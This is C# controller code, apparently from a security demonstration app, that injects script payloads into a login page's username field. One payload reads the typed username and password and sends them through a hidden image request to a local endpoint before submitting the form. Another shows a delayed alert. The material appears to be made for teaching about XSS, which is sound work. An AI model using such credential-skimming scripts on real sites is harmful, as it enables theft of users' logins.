public ActionResult MoreInteresting(bool autorun) { var model = new LoginExploitViewModel(); model.Exploit = autorun; model.UserName = @" <script> function submitForm() { document.forms[0].submit(); } function formPreSubmit() { var username = document.getElementById('UserName').value; var password = document.getElementById('Password').value; var img = document.createElement('img'); img.src = 'https://localhost:6001/LoginExploit/ShowCat?' + 'u=' + encodeURIComponent(username) + '&p=' + encodeURIComponent(password); img.style= 'width:0px;height:0px;border:white 0px none;' document.body.appendChild(img) setTimeout(submitForm, 500); } document.addEventListener('DOMContentLoaded', function(event) { document.getElementById('UserName').value = ''; document.getElementsByClassName('error')[0].innerHTML = ''; document.getElementById('login').onclick = formPreSubmit; }); </script>"; return(View("Index", model)); }
public ActionResult Alert(bool autorun) { var model = new LoginExploitViewModel(); model.Exploit = autorun; model.UserName = "******"; return(View("Index", model)); }
public ActionResult CSRF(bool autorun) { var model = new LoginExploitViewModel(); model.Exploit = autorun; model.UserName = "******"; model.Password = "******"; return(View("Index", model)); }
public ActionResult StealthAlert(bool autorun) { var model = new LoginExploitViewModel(); model.Exploit = autorun; model.UserName = @" <script> function DoIt() { alert('Hello World'); } document.addEventListener('DOMContentLoaded', function(event) { document.getElementById('UserName').value = ''; document.getElementsByClassName('error')[0].innerHTML = ''; setTimeout(DoIt, 5000); }); </script>"; return(View("Index", model)); }